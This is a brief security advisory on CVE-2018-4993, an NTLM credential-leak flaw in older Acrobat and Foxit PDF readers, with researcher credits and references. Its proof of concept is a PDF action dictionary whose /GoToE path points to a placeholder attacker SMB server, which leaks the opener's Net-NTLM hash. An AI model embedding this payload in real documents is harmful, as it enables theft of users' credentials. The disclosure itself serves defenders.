CVE-2018-4993

Multiple PDF Readers • Acrobat Reader DC 2018.011.20038 and earlier versions, 2017.011.30079 and earlier versions, 2015.006.30417 and earlier versions; Foxit Reader < version 9.1 • NTLMv2 hash leakage leads to credential theft
Reported on 30-Jan-18 by Ido Solomon, Assaf Baharav, Yaron Fruchtman
CPR-ID: 1029
Upload Date: 24-Jul-19

Information

A data leakage vulnerability exists in the GoToE and GoToR actions in the PDF file format. Successful exploitation results in leakage of the affected user’s Net-NTLM credentials.

PoC:

	/AA	<<
		/O	<<
			/F (\\\\ <attacker_smb_server> \\ <dummy_file>)
			/D [ 0 /Fit ]
			/S /GoToE
		>>
	>>

References:
https://helpx.adobe.com/security/products/acrobat/apsb18-09.html, https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/

Share this: